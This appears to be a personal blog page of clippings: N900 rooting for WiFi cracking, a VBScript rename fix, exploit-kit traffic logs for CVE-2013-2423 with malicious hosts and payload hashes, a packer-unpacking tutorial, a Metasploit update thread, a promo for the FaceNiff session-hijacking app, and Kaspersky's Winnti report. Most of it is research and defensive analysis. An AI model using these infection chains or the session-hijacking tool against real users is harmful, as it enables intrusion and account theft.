2013年4月28日 星期日

n900 install wifi crack tools

http://www.mobile01.com/topicdetail.php?f=122&t=1538418
N900-flasher刷機篇
http://wiki.maemo.org/Kernel_Power
Kernel Power
http://david.gnedt.eu/blog/wl1251/
bleeding-edge wl1251 driver for Maemo Fremantle
http://talk.maemo.org/showthread.php?p=905982
 [Announce] bleeding-edge wl1251 wifi driver for Maemo Fremantle
http://talk.maemo.org/showpost.php?p=914062&postcount=1
http://www.youtube.com/watch?v=9LRSxQ7UoAc
[Maemo 5] fAircrack (Aircrack GUI)
http://talk.maemo.org/showthread.php?t=69009

    upgrade firmware to pr1.3
      download nokia suite & upgrade your n900

       以下的內容是來自maemo.org的Flash傻瓜更新法,我簡單的翻譯一下:
      1. 到Nokia下載Nokia Flasher
      2. 到Nokia下載最新的PR 1.3軟體
      3. 安裝Nokia Flasher
      4. 把剛剛下載的PR 1.3韌體放到Flasher的目錄下,此外確定手機關機,且USB無連結到電腦上
      5. 接下來是關鍵了:將手機Nokia N900鍵盤打開並按著”U”鍵,然後把USB插入電腦,直到螢幕右下方出現”NOKIA ROM”安裝成功後才可以放開”U”
      6. 執行Nokia Flasher,這個時候會進入DOS畫面,然後輸入以下的字串:
      flasher-3.5.exe -F RX-51_2009SE_20.2010.36-2_PR_COMBINED_MR0_ARM.bin -f -R
      我抓的是國際版的PR 1.3,所以檔案名稱是RX-51_2009SE_20.2010.36-2_PR_COMBINED_MR0_ARM.bin
      最後面的-R非常非常的重要,表示不要刷新手機的通訊錄等資料,但軟體會全部還原

      flasher.jpg

      flasher_2.jpg

      接著如果看到系統自動開機,就是成功了,如果沒有...嗯,先別想這麼多,至少台灣Nokia N900可以維修,不用太擔心拉哇哈哈哈哈哈~

      說真的,Nokia N900上了PR 1.3之後,網路有比較順嗎?目前確實可以感受到「一點點」,我是比較在意土豆網跟Youtube是否播放順暢,目前還在下載TweakFlash Plugin來遍過網站開啟Flash視訊影片,所以還無從得知。對了,有人表示電池量有比較持久了呢!

      上述的Flasher使用說明原文 http://wiki.maemo.org/Updating_the_tablet_firmware

      也有高人分享更新的細節可以考這裡http://amanda_hoic.mysinablog.com/index.php?op=ViewArticle&articleId=2664486

      How to Get to the Root of the Nokia N900

      Instructions

        • 1
          Open the main menu, and select "App manager."
        • 2
          Select "Application Catalogues," and choose "New."
        • Enter "maemo.org extras-testing" for the catalog name.
        • 4
          Enter "http://repository.maemo.org/extras-testing" for the Web address.
        • 5
          Type "fremantle" for the distribution, and "free non-free" under components.
        • 6
          Select "Save."
        • 7
          Click "rootsh" from the App manager screen to download the application.
        • 8
          Return to the main screen, and press "Menu."
        • 9
          Open "X-Terminal," and type "rootsh" or "sudo gainroot" in the command line. Rootsh gives you full access, while sudo gainroot gives you root access without enabling the R&D mode on the N900.
        •  
      添加這三個程式源
      Maemo Extras
      http://repository.maemo.org/extras/
      fremantle
      free non-free

      Maemo Extras-testing
      http://repository.maemo.org/extras-testing/
      fremantle
      free non-free

      Maemo Extras-devel
      http://repository.maemo.org/extras-devel/
      fremantle
      free non-free

      VBScript Get File Extension

      http://coderstalk.blogspot.com/2011/04/vbscript-get-file-extension.html

      Actually, I got this question from the reader of my previous blog post about VBScript to Replace Underscores in Filename with Spaces for All Files in a Folder, and I decided to answer it here.

      Question from Justin:
      I tried something simular..but modified your VBS..
      '========================================================
      ' VBScript to replace underscore in file name with space
      ' for each files in a folder
      ' Written by ApOgEE of http://coderstalk.blogspot.com
      '========================================================
      Dim sName
      Dim fso
      Dim fol

      ' create the filesystem object
      Set fso = WScript.CreateObject("Scripting.FileSystemObject")

      ' get current folder
      Set fol = fso.GetFolder(".")

      ' go thru each files in the folder
      For Each fil In fol.Files
      ' check if the file name contains underscore
      If InStr(1, fil.Name, "The ") <> 0 Then
      ' replace underscore with space
      sName = Replace(fil.Name, "The ", "") & ", The"
      ' rename the file
      fil.Name = sName
      End If
      Next

      ' echo the job is completed
      WScript.Echo "Completed!"

      i have Files in a given folder that has Names in them...

      ie.
      The Last Star Fighter
      Gone with the wind
      The Good, the Bad, and the Ugly.

      With the modified VBS above Ive run it and i get the following...
      Last Star Fighter.mp4, The
      Gone with the Wind
      Good, the Bad, and the Ugly.mp4, The
      How do i get rid of the extention in the middle of the name? What am I doing wrong?

      My First answer:
      Dear Justin,
      check your code again. Search for line of code containing
      "sName = Replace"
      and remove the code after ')'.

      Specifically, the code:
      '& ", The"'
      have to be removed.

      Justin Replies:
      Ok i Changed the Line in question...and Reran the code...

      Now i get...
      Gone with the Wind --ok
      Good, the Bad, and the Ugly --Problem

      Last Star Fighter --Problem

      They Should read...
      Gone with the Wind
      Good, the Bad, and the Ugly, The
      Last Star Fighter, The

      My Answer:
      If that is the case, you should get and strip the file extension before you replace the name and add it back to the filename after replacement. Here is the snippet:
      ' get the file extension
      sExtension = fso.GetExtensionName(fil.Name)
      ' strip the extension from file name
      sName = Replace(fil.Name, "." & sExtension, "")
      ' replace the whatever and put the extension back
      sName = Replace(sName, "The ", "") & ", The" & "." & sExtension

      and your new code should look like this:
      '========================================================
      ' VBScript to replace underscore in file name with space
      ' for each files in a folder
      ' Written by ApOgEE of http://coderstalk.blogspot.com
      '========================================================

      Dim sName
      Dim fso
      Dim fol

      ' create the filesystem object
      Set fso = WScript.CreateObject("Scripting.FileSystemObject")

      ' get current folder
      Set fol = fso.GetFolder(".")

      ' go thru each files in the folder
      For Each fil In fol.Files
      ' check if the file name contains underscore
      If InStr(1, fil.Name, "The ") <> 0 Then
      ' replace underscore with space
      ' sName = Replace(fil.Name, "The ", "") & ", The"
      ' get the file extension

      sExtension = fso.GetExtensionName(fil.Name)
      ' strip the extension from file name
      sName = Replace(fil.Name, "." & sExtension, "")
      ' replace the whatever and put the extension back
      sName = Replace(sName, "The ", "") & ", The" & "." & sExtension
      ' rename the file
      fil.Name = sName
      End If
      Next

      ' echo the job is completed
      WScript.Echo "Completed!"
      Good luck!

      CVE-2013-2423 integrating Exploit Kits

      http://malware.dontneedcoffee.com/2013/04/cve-2013-2423-integrating-exploit-kits.html

      One week after Patch Java7u21 the vulnerability is being exploited in mass blind attack.
      ( First alert come from Timo Hirvonen with CrimeBoss and later CritXPack/SafePack. Will update for these EK as soon as i land on it)

      Cool EK:
      CVE-2013-2423 successful path in Cool EK 2013-04-23


      GET http://lekarskiejowlslight.ahmedpekin .net/works-softly.htm
      200 OK (text/html)

      GET http://lekarskiejowlslight.ahmedpekin .net/hopeful_orchestra-surveyor_remove.jar
      200 OK (application/java-archive) 9339cb68dd4a1301f8b84da55bacd6b4

      CVE-2013-2423 in Cool EK Jar


      GET http://95.211.[bip]/getqq.jpg  c795ac9a7a84930c4da54439026556c6  Reveton as usual.
      200 OK (application/x-msdownload)

      < edit1 2013-04-26>
      Sweet-Orange :


      CVE-2013-2423 positive path in Sweet Orange 2013-04-26
      GET http://prioritiesinformationlockdown .net/upgrade/uploads/photo/pets.php?spamnav=237
      200 OK (text/html)

      < edit5 2013-04-27> Security Bypass has been added.
      Looks like that :
      Security bypass implemented in Sweet Orange 2013-04-27

      < /edit5>
      GET http://prioritiesinformationlockdown .net/upgrade/uploads/photo/bDCoZGmn.jar
      200 OK (application/x-java-archive) d4a716a6434462ddd1b99a85f3d9cf87

      CVE-2013-2423 in SWT


      GET http://prioritiesinformationlockdown .net/upgrade/uploads/photo/KOrJjsK.jar
      200 OK (application/x-java-archive) 49ca9dcbf4cc7176bb656ded3eb03dba




      GET http://prioritiesinformationlockdown .net/iraq.php?setup=750&humor=598&star=4&virus=629&entry=171&paper=545&stars=451&intm=257&books=550&myguest=958
      200 OK (application/octet-stream) Decoded payload : f94c16dc1c399849e37064e17c5337e1 (Ransomware c&c http://utrento .com/picture.php )


      Undefined (for now) Ransomware landing for UK
      </edit1>
      < edit3 2013-04-27>
      Neutrino :


      "Добавлен новый эксплоит, пробив приятно поднялся ;)"
      translated as :
      Added a new exploit, breaking up nicely ;)

      CVE-2013-2423 in Neutrino 2013-04-27 with Security Bypass


      Security Bypass  (as explained by Security Immunity) in Neutrino
      after some decoding
      GET http://evaluation-man .net/ldeiyxlmeiujjn?fqemlffr=5884689
      200 OK (text/html)

      GET http://ajax.googleapis .com/ajax/libs/jquery/1.9.1/jquery.min.js
      200 OK (text/javascript)

      GET http://evaluation-man .net/scripts/js/plugin_detector.js
      200 OK (application/x-javascript)

      POST http://evaluation-man .net/cvwrssa
      200 OK (text/html)

      GET http://evaluation-man .net/eqtmw?hvvsxlyebdkj=517ba030aaa2cc8561032cc5
      200 OK (application/java-archive)  4387db4a1da8f8f68df4369f8e6d46b6


      CVE-2013-2423 in Neutrino Jar


      GET http://evaluation-man .net/puvpdxcfdwntco?htigpfblxyx=517ba030aaa2cc8561032cc5
      200 OK (application/octet-stream) Decoded payload : a69ffadf3d021f3edfb7b811e2fcb753 Urausy

      Part of Urausy LU Design 2013-04-27



      File: Neutrino_CVE-2013-2423.zip (OwnCloud via goo.gl)
      < /edit3>
      < edit4 2013-04-27>
      Sakura :


      CVE-2013-2423 & Security Bypass successful path in Sakura EK
      GET http://ef4g.stencilmaster1 .com:88/page/word.php
      200 OK (text/html)

      Security Bypass in Sakura (after partial deobfus) - 2013-04-27


      GET http://ef4g.stencilmaster1 .com:88/page/important_whole_mile.php
      200 OK (application/x-java-archive) b7c19737bcbeb0613ade20b71e2797fe

      CVE-2013-2423 in Sakura Jar file 2013-04-27
      GET http://ef4g.stencilmaster1 .com:88/page/3906.htm
      200 OK (application/octet-stream)  Decoded payload : 1ecc8081e6fe50c886735c45e788d16d


      Part of Urausy NL Design 2013-04-27


      Files : Sakura_Landing_Jar_Payload_CVE-2013-2423.zip (OwnCloud via goo.gl)
      < /edit4>


      Reading :
      CVE-2013-2423 on mitre
      CVE-2013-2423 Metasploit Module
      Java is So Confusing... - Trustwave/Spiderlabs - Anat Davidi -2013-04-19
      Java 7 Update 21 - IKVM.Net Weblog - 2013-04-17
      Post Publication Readings :
      Yet Another Java Security Warning Bypass - Immunity - 2013-04-24 - Esteban Guillardoy
      The Latest Java Exploit with Security Prompt/Warning Bypass (CVE-2013-2423) - Security Obscurity - 2013-04-26
      K.I.A. – Java CVE 2013-2423 Via New and Improved Cool EK - Anup Ghosh - Invincea - 2013-04-26

      Basic Packers: Easy As Pie

      http://blog.spiderlabs.com/2013/04/basic-packers-easy-as-pie.html

      Throughout Trustwave SpiderLabs’ many forensic investigations, we often stumble upon malicious samples that have been ‘packed’. This technique/concept can be unfamiliar to the aspiring malware reverser or digital forensic investigator, so I thought it would be fun to use this opportunity to talk about portable executable (PE) packers at a high level. If you already know what PE packers are and how they work, you’re more than welcome to continue reading, however it’s certainly possible you may not learn something new. Think of this as a 101 blog post.
      So what are PE packers? How do they work? How can you defeat them? I’m going to do my best to answer these questions.

      Overview

      In essence, packers are tools that are used to compress a PE file. This primarily allows the person running the tool to reduce the size of the file. As an added benefit, since the file is compressed, it will also typically thwart many reverse engineers from analyzing the code statically (without running it). Packers were originally created for legitimate purposes, to decrease the overall file size. Later on, malware authors realized the benefits previously mentioned and began to utilize them as well. Of course, just compressing a PE file won’t really work on its own. If you try to run it, the file will complain, and fail, and you’ll end up having a horrible day.
      In order to address this, packers will wrap this compressed data inside a working PE file structure. When run, the packed file will decompress the legitimate PE file data into memory, and execute it.
      Before we get into the specifics of how this takes place at a technical level, it’s important to understand some of the fundamentals of how a PE file is structured.

      PE File Structure

      Whether you know it or not, it’s a near certainty that you’ve encountered PE files before. If you’ve used Microsoft Windows, you’ve used PE files. It’s a file format developed by Microsoft that is used on a large number of file types. The most common ones that you’re likely to recognize are .exe and .dll files (executables and dynamic-linked libraries respectively). PE files are made of two parts—The header and sections. The header contains details about the PE file itself, while the sections contain the contents of the executable.
      The header is broken up into a number of different parts—the DOS header, the PE header, optional headers, and the sections table. There can be any number of sections within a PE file, and they can be named anything the author would like. However, there must almost always be sections containing the actual code of the file, the import table, and the data used by the code. It ends up looking something like this: 
      Pe_structure

      PE Headers

      The optional header in particular is of special importance when we’re talking about (un)packing. Not to diminish the DOS or PE header importance, but they simply don’t offer anything we’re interested in for the scope of this blog post. All you really need to know about those headers is that they simply contain information about the PE file structure itself.

      Optional Header

      This header can contain a wealth of information, such as the size of code on disk, the checksum of the file, the size of the stack and heap, etc. It also contains the address of the entry point, or where code execution will begin. This becomes important later as the packer modifies this value, and it will fall on us to find the location the original entry point, or OEP, of the packed file. Once this is identified, we can dump the memory of the executable, reconstruct the imports (mentioned more in a second), and voilà, we’re good to go.
      Data directories are contained within the optional header. Data directories contain tables that contain information about resources, imports, exports, debug information, and local thread storage to name a few. If you’re looking for more in-depth information on the data directories, I highly recommend you take a look at this great MSDN article on the topic. The import information in particular is of special interest to us. Before we jump into it, let’s talk about imports for a second—
      So to explain imports, let’s think of a hypothetical situation. We have five executables that all share some piece of code. Now, it doesn’t really make a ton of sense for all of these executables to store this code by themselves. Instead, it makes a lot more sense to break out this code into a separate library and simply have each executable load this library at runtime. This is essentially what the import table is—A list of libraries and their associated functions that an executable wishes to load at runtime. This table of functions and libraries is replaced in a packed file, and is generated when executed. This means that if we wish to unpack a binary that has been packed, we’ll have to reconstruct this information in order for the unpacked PE file to be valid and to work as expected. Once this header is parsed, execution flow moves onto the Sections table.

      Sections Table

      The Sections Table outlines all sections that are present within the PE file. This includes the name of the section, the location of the section, size of the section both in the file and in virtual memory, as well as any flags associated with that section.  Sections make up the bulk of the PE file itself, so it is important to have this table of information on hand.

      PE Sections

      As mentioned earlier, PE sections typically at the very least contain a section for code, a section for data, and a section for imports. The import section contains the actual addresses for all functions needed by the PE file. These addresses are populated at runtime, as every Windows system may be different. As such, it’s possible that a function may not be located at the same memory location between Windows versions. By populating the import table with these addresses at runtime, it allows us to use this PE file on multiple Microsoft Windows machines.

      Digging Into An Example

      Now that we’ve got a decent grasp of the PE file structure, let’s use what we’ve learned to manually unpack an actual file. For this example I’m going to use calc.exe using the packer MPRESS. MPRESS is a popular packer that has been around for a while now. It supports a large number of file types and works on all current versions of Microsoft Windows. So before we pack our file, let’s take a quick look at what calc.exe looks like in its original state.
      Using one of my favorite tools, CFFExplorer, we can easily view various pieces of information about the PE file structure, including, but not limited to various headers, section information, import information, and any embedded resource entries. I’ve specifically shown the Optional Header and the various sections contained in calc.exe in the screenshots below. 
      1
      2
      Now let’s pack the sample with MPRESS and see how the file has changed. As you can see in the following screenshots, MPRESS has modified the sections present in the PE file. The “.text” and “.data” sections have been replaced with “.MPRESS1” and “.MPRESS2”. The “.MPRESS1” section contains the compressed data of the original calc.exe file, and the “.MPRESS2” section contains a number of functions used to decompress this data and reconstruct the import table.
      3
      4
       You might also notice in the above screenshot that the entry point of code execution (AddressOfEntryPoint) has changed. The first step in unpacking this sample manually is to identify the original entry point (OEP). Let’s start unpacking this sample dynamically.
      5For this example, I’m going to switch between IDA Pro and OllyDbg. You’re welcome to use whatever tools you wish, but my personal style just leads me to switching between these tools often, so I’m going to use them both here. I find that IDA does a better job of visualizing what is happening, but OllyDbg tends to have more features and better results in a dynamic analysis environment.
      One of the first things we see while debugging the sample is a call to this rather complicated function. This function is in actuality decompressing the compressed data found in ‘.MPRESS1’. It uses an interesting technique called ‘in-place decompression’ to accomplish this. That is to say, MPRESS is able to decompress the data without creating a new section of memory and dumping the decompressed data to it. Instead, it simple overwrites the compressed data with the decompressed data.
      Once decompression completes, we then see code execution pass to a series of loops, which reconstruct the import table. This can be seen below where I demonstrate a before and after of the unpacking process:

       
      6
      Eventually, we hit the original entry point of the (at this point) unpacked calc.exe. It is here we want to dump the process’ memory to disk. For this task, I prefer a plugin for OllyDbg called OllyDump. Not only will this allow you to dump the process, but it also has the ability to, among other things, rebuild the import table (remember the packing process destroys the original).
      7
      Like many things in this industry, there are many ways to approach this. If you’re not a big fan of OllyDbg, a nice alternative to the plugin I just mentioned is a tool called ChimpRec. The tool’s main page has a full list of features, but essentially it allows you do dump a currently running process and rebuild its imports. I’m sure there are many others out there that will accomplish the same thing. These two utilities are simply my personal favorites.
      And at this point that’s really all there is to it for unpacking a basic packed binary. I haven’t touched on a number of more advanced functionality that is present in other packers. Namely, the ability to perform anti-reversing techniques. It is my hope to discuss some of these techniques in future blog posts.

      一些黑客的twitter

      https://twitter.com/timohirvonen

      updating metasploit through git

      https://community.rapid7.com/message/6761#6761

      hi all,
      I have installed metasploit 4.5 using the linux binary installer from the site.
      Now I wish to update it using git ........ as I have been told that going through git would only solve the mystry of my java_jre17_jmxbean exploit not working
      can I update the existing install using git ?  what should be the command to do that and pull down all the latest exploits like -  java_jre17_jmxbean
       
      thanks in advance
      jinTao


      • Re: updating metasploit through git
        ipwnstuff Ronin
        当前正在审查
        Edit: I missed the part where you wanted to keep your current install and use git.
        You can try this:
        $ cd /opt/metasploit/msf3
        $ git init
        $ git remote add origin git://github.com/rapid7/metasploit-framework.git
        Use `nano .git/config` to edit /opt/metasploit/msf3/.git/config to look like the following: (add the last three lines)
        /opt/metasploit/msf3/.git/config
        [core]
                repositoryformatversion = 0
                filemode = true
                bare = false
                logallrefupdates = true
                ignorecase = true
        [remote "origin"]
                url = git://github.com/rapid7/metasploit-framework.git
                fetch = +refs/heads/*:refs/remotes/origin/*
        [branch "master"]
          remote = origin
          merge = refs/heads/master
        $ git fetch
        $ git reset --hard HEAD
        $ git pull
        And for good measure run `git status` to check that there aren't any local changes.
         
        Original answer:
        Sounds like your problem may be related to this question or this one. But if you're just interested in using git instead you can remove the files provided by the binary installer and clone metasploit-framework from Github. Use the following to do so:
        $ git clone git://github.com/rapid7/metasploit-framework.git /opt/metasploit/msf3
        After cloning you'll be able to run msfupdate like normal, though you'll also already be up to date for now.
         
        Message was edited by: Erran Carey
        • Re: updating metasploit through git
          jintao Apprentice
          当前正在审查
          thanks I took your first advice :-
          uninstalled the old binary
          rm -rf  /opt/metasploit/msf3
          then did a git clone   
          git clone git://github.com/rapid7/metasploit-framework.git /opt/metasploit/msf3
          It works like  a charm now.
          thanks again
          jinTao

      FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to

      http://faceniff.ponury.net/

      aceNiff is an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to.
      It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK)
      It's kind of like Firesheep for android. Maybe a bit easier to use (and it works on WPA2!).

      *** ROOTED PHONE *** is required. Please note that if webuser uses SSL this application won't work.
      This application due to its nature is very phone-dependant so please let me know if it won't work for You

      Use with stock browser (might not work with other)
      Legal notice: this application is for educational purposes only. Do not try to use it if it's not legal in your country.
      I do not take any responsibility for anything you do using this application. Use at your own risk

      This apk is limited to use only 3 hijacked profiles, if you want more - you will need activation code. You can buy it from the app - hit Menu and Unlock App
      DONATIONS CAN BE SENT TO BITCOIN ADDRESS - 1Lp9C3NXiR7tF28rTN8t31xmKLBPaThXLG


      NEW 2.4 FINAL RELEASE: FaceNiff-2.4.apk


      Any questions? - Look at forum here: http://forum.ponury.net/
      Changelog: http://forum.ponury.net/viewtopic.php?f=6&t=4

      Supported services: (new coming soon)
      • FaceBook
      • Twitter
      • Youtube
      • Amazon
      • VKontakte
      • Tumblr
      • MySpace
      • Tuenti
      • MeinVZ/StudiVZ
      • blogger
      • Nasza-Klasa
      If you have any questions please look at the forum first: http://forum.ponury.net/ If you want to contact me look here: http://ponury.net/contact
      If you didn't get the Key for the app after buying please check spam, if it's not there then click "Buy" again - it will redirect you to a page with your key. In case everything fails - contact me we'll figure this out

      Donations are welcome:

      bitcoin address: 1Lp9C3NXiR7tF28rTN8t31xmKLBPaThXLG

      Winnti. More than just a game

      http://www.securelist.com/en/analysis/204792287/Winnti_More_than_just_a_game

      Table of Contents

      Kaspersky Lab began this ongoing research in the autumn of 2011. The subject is a series of targeted attacks against private companies around the world.
      In the course of our research we uncovered the activity of a hacking group which has Chinese origins. This group was named "Winnti".
      According to our estimations, this group has been active for several years and specializes in cyberattacks against the online video game industry. The group’s main objective is to steal source codes for online game projects as well as the digital certificates of legitimate software vendors. In addition, they are very interested in how network infrastructure (including the production of gaming servers) is set up, and new developments such as conceptual ideas, design and more.
      We weren't the first to focus on this group and investigate their attacks. In 2010 US-based HBGary investigated an information security incident related to the Winnti group at one of HBGary's customers – an American video game company.

      In the Beginning Was …

      In the autumn of 2011, a Trojan was detected on a huge number of computers – all of them linked by the fact that they were used by players of a popular online game. It emerged that the piece of malware landed on users’ computers as part of a regular update from the game’s official update server. Some even suspected that the publisher itself was spying on players. However, it later became clear that the malicious program ended up on the users’ computers by mistake: the cybercriminals were in fact targeting the companies that develop and release computer games.
      The computer game publisher whose servers spread the Trojan asked Kaspersky Lab to analyze the malicious program that was found on its update server. It turned out to be a DLL library compiled for a 64-bit Windows environment and even had a properly signed malicious driver.
      The malicious DLL landed on gamers’ computers running under either 32-bit or 64-bit operating systems. It couldn’t start in 32-bit environments, but it could, under certain conditions, launch without the user’s knowledge or consent in 64-bit environments, though no such accidental launches have been detected.
      The DLL contained a backdoor payload, or, to be exact, the functionality of a fully-fledged Remote Administration Tool (RAT), which gave cybercriminals the ability to control the victim computer without the user’s knowledge.
      The malicious module turned out to be the first time we saw Trojan applications for the 64-bit version of Microsoft Windows with a valid digital signature. We had seen similar cases before, but all previous incidents where digital signatures were abused affected only 32-bit applications.
      At an early stage of our research, we identified a fair number of similar backdoors, both 32-bit and 64-bit, in our collection of malware samples that were detected under various verdicts. We grouped them together into a separate family. Symantec appears to be the first to name these malicious programs; we kept Symantec’s name – Winnti – in the name of the malware family we created: Backdoor.Win32(Win64).Winnti. As for the people behind these attacks involving this remote administration tool, we ended up calling them “the Winnti group”.
      Interestingly, the digital signature belonged to another video game vendor - a private company known as KOG, based in South Korea. This company’s main business was MMRPG games, exactly the same area as the first victim.
      We contacted KOG, whose certificate was used to sign the malicious software, and notified Verisign, which issued the certificate for KOG. As a result the certificate was revoked.

      Digital Certificates

      When we discovered the first stolen digital certificate we didn't realize that stealing the certificates and signing malware for future attacks against other targets was the preferred method of this group. Over the next 18 months we discovered more than a dozen similar compromised digital certificates.
      Moreover, we found that those digital certificates seemed to have been used in attacks organized by other hacking groups, presumably coming from China.
      For example, in an attack against South Korean social networks Cyworld and Nate in 2011 the attackers used a Trojan that was digitally signed using a certificate of from the gaming company YNK Japan Inc.
      A digital certificate of the same company was used recently (March 2013) in Trojans deployed against Tibetan and Uyghur activists. In fact, this story dates back to 2011. We highly recommend this Norman blogpost about a similar incident.
      At the same time, in March 2013, Uyghur activists were targeted by other malware, which was digitally signed by another gaming company called MGAME Corp.
      We believe that the source of all these stolen certificates could be the same Winnti group. Either this group has close contacts with other Chinese hacker gangs, or it sells the certificates on the black market in China.
      Below is the list of known compromised companies and digital certificates used by the Winnti group in different campaigns:
      Company Serial number Country
      ESTsoft Corp 30 d3 fe 26 59 1d 8e ac 8c 30 66 7a c4 99 9b d7 South Korea
      Kog Co., Ltd. 66 e3 f0 b4 45 9f 15 ac 7f 2a 2b 44 99 0d d7 09 South Korea
      LivePlex Corp 1c aa 0d 0d ad f3 2a 24 04 a7 51 95 ae 47 82 0a South Korea/ Philippines
      MGAME Corp 4e eb 08 05 55 f1 ab f7 09 bb a9 ca e3 2f 13 cd South Korea
      Rosso Index KK 01 00 00 00 00 01 29 7d ba 69 dd Japan
      Sesisoft 61 3e 2f a1 4e 32 3c 69 ee 3e 72 0c 27 af e4 ce South Korea
      Wemade 61 00 39 d6 34 9e e5 31 e4 ca a3 a6 5d 10 0c 7d Japan/South Korea/US
      YNK Japan 67 24 34 0d db c7 25 2f 7f b7 14 b8 12 a5 c0 4d Japan
      Guangzhou YuanLuo 0b 72 79 06 8b eb 15 ff e8 06 0d 2c 56 15 3c 35 China
      Fantasy Technology Corp 75 82 f3 34 85 aa 26 4d e0 3b 2b df 74 e0 bf 32 China
      Neowiz 5c 2f 97 a3 1a bc 32 b0 8c ac 01 00 59 8f 32 f6 South Korea



      Victims

      It’s tempting to assume that Advanced Persistent Threats (APTs) primarily target high-level institutions: government agencies, ministries, the military, political organizations, power stations, chemical plants, critical infrastructure networks and so on. In this context it seems unlikely that a commercial company would be at risk unless it was operating on the scale of Google, Adobe or The New York Times, which was recently targeted by a cyberattack, and this perception is reinforced by the publicity that attacks on corporations and government organizations usually receive. However, any company with data that can be effectively monetized is at risk from APTs. This is exactly what we encountered here: it was not a governmental, political, military, or industrial organization but gaming companies that were targeted.
      It’s difficult to name all the victims of the Winnti team. Judging by the information that we have at our disposal – namely the tags within malicious programs, the names of the C&C domains, the companies whose digital certificates were stolen to sign malware, and the countries where detection notifications came from – we can say that at least 35 companies have been infected by Winnti malware at some time.
      Countries where the affected companies are located:
      Asia Europa South America North America
      Vietnam Belarus Brazil USA
      India Germany Peru
      Indonesia Russia
      China
      Taiwan
      Thailand
      Phillipines
      S. Korea
      Japan



      This data demonstrates that the Winnti team is targeting gaming companies located in various parts of the world, albeit with a strong focus on SE Asia.

      Countries where gaming companies have been affected
      Such geographic diversity is hardly surprising. Often, gaming companies (both publishers and developers) are international, having representatives and offices worldwide. Also, it is common practice for gaming companies from various regions to cooperate. The developers of a game may be located in a different country from its publisher. When a game later reaches markets in regions away from its initial ‘home’, it is often localized and published by other publishers. In the course of this cooperation, the partner companies often grant each other access to network resources to exchange data associated with the gaming content, including distribution kits, gaming resources, resource assembly kits, etc. If one company in the network gets infected, it’s easy for the cybercriminals to spread the infection throughout the partnership chain.

      Winnti C&Cs Structure

      During the investigation, we identified over a hundred malicious programs, every single one compiled to attack a particular company. Typically, separate C&C domains were assigned to each targeted company. Virtually all the C&C domains were arranged as follows: a second-level domain was created without a DNS A-record, i.e., there was no IP address assigned to it.
      In case there was an A-record, the assigned IP address was typically 127.0.0.1. It is also noteworthy that some of the second-level domains that the cybercriminals created for their C&C had very similar names to the domain hosting the site of a certain real gaming company. And the malicious users’ domain was resolved to the same IP address which the site of the real gaming company used. In any case, the third-level domains resolved to IP addresses assigned to the attackers’ actual C&C servers.

      C&C domain naming and resolution
      Sometimes the Winnti team registered their C&C units with public hosts. Judging by the samples identified, these C&C centers were subdomains of such domains as 6600.org, 8866.org, 9966.org or ddns.net.
      From the names of the C&C domains or subdomains, the attack targets or countries of residence could be guessed, as in:
      ru.gcgame.info
      kr.zzsoft.info
      jp.xxoo.co
      us.nhntech.com
      fs.nhntech.com
      as.cjinternet.us

      The subdomains “ru”, “kr”, ”jp” and “us” most probably mean that these C&C servers manage bots hosted on the computers of companies located in Russia, South Korea, Japan and the US respectively, while “fs” and “as” are acronyms for the names of the companies being attacked.
      Sometimes Winnti’s malicious programs had a local IP address, such as 192.168.1.136, specified in their settings for the C&C. This could mean that at some point of time there was an infected computer that did not have a connection to the Internet, but the cybercriminals needed control over it (it may have been infected while malware was spread via a corporate network). In this case, the cybercriminals deployed a dedicated local C&C server on another compromised computer within the same local network which did have an Internet connection; via that C&C, the first victim computer could be controlled. System administrators often try to isolate critical computers from the outside world. This decreases the probability of haphazard infection, but, apparently, does not always help in a targeted attack.
      In the Winnti samples that were detected and analyzed, we found 36 unique C&C domains. Most probably, this is only a small portion of all existing Winnti C&C domains, as we only managed to obtain some of the samples from this malware family. This is hardly surprising since these malicious programs are used to execute targeted attacks, so no information is available about many instances of infection; for this reason, we have no way of obtaining samples of the malware used in these undisclosed attacks.
      Domain names used in the attacks we discovered:
      newpic.dyndns.tv lp.zzsoft.info ru.gcgame.info
      update.ddns.net lp.gasoft.us kr.jcrsoft.com
      nd.jcrsoft.com eya.jcrsoft.com wm.ibm-support.net
      cc.nexoncorp.us ftpd.9966.org fs.nhntech.com
      kr.zzsoft.info kr.xxoo.co docs.nhnclass.com
      as.cjinternet.us wi.gcgame.info rh.jcrsoft.com
      ca.zzsoft.info tcp.nhntech.com wm.nhntech.com
      sn.jcrsoft.com ka.jcrsoft.com wm.myxxoo.com
      lp.apanku.com my.zzsoft.info ka.zzsoft.info
      sshd.8866.org jp.jcrsoft.com ad.jcrsoft.com
      ftpd.6600.org su.cjinternet.us my.gasoft.us
      tcpiah.googleclick.net vn.gcgame.info  
      rss.6600.org ap.nhntech.com  



      Knowing the 2nd level domains used by Winnti, we brute forced through all 3rd level subdomains up to 4 symbols long, and identified those that have the IP addresses of real servers assigned to them. Having searched through subdomains for a total of 12 2nd level domains, we identified 227 “live” 3rd level domains. Many of them are C&C servers for Winnti-class malware that have hitherto remained unidentified.
      Analyzing the WHOIS data for the 12 2nd level domains, we found the following list of email addresses used for registration:
      evilsex@gmail.com
      jslee.jcr@gmail.com
      whoismydns@gmail.com
      googl3@live.com
      wzcc@cnkker.com
      apanku2009@gmail.com

      For some of these domains, registration data proved to be the same as those for the domain google.com:
      Registrant: Google Inc.
      1600 Amphitheatre Parkwa
      Mountain Vie, California 94043
      United States
      +1.6503300100
      Judging by the domain registration data, the Winnti team started their criminal activities at least in 2007. Their early domains were involved in spreading rogue antiviruses (FakeAV). From 2009 onwards, domains began to emerge hosting C&C servers for bots used to infect gaming companies. Apparently, the cybercriminals graduated to relatively large-scale penetrations into the corporate networks of gaming companies starting from 2010.

      Known Malware

      The attackers’ favorite tool is the malicious program we called "Winnti". It has evolved since its first use, but all variants can be divided into two generations: 1.x and 2.x. Our publication describes both variants of this tool.
      In our report we publish an analysis of the first generation of Winnti.
      The second generation (2.x) was used in one of the attacks which we investigated during its active stage, helping the victim to interrupt data transfer and isolate infections in the corporate network. This incident and our investigation is described in detail here.
      In addition to that, we have observed the use of a popular backdoor known as PlugX, which is believed to have Chinese origins. Previously, this had only been used in attacks against Tibetan activists.

      The Commercial Interest

      As has been stated above, APTs can target any commercial company if cybercriminals find a way to make a profit from the attack.
      So which methods do cybercriminals use to generate illicit earnings from attacks on gaming companies?
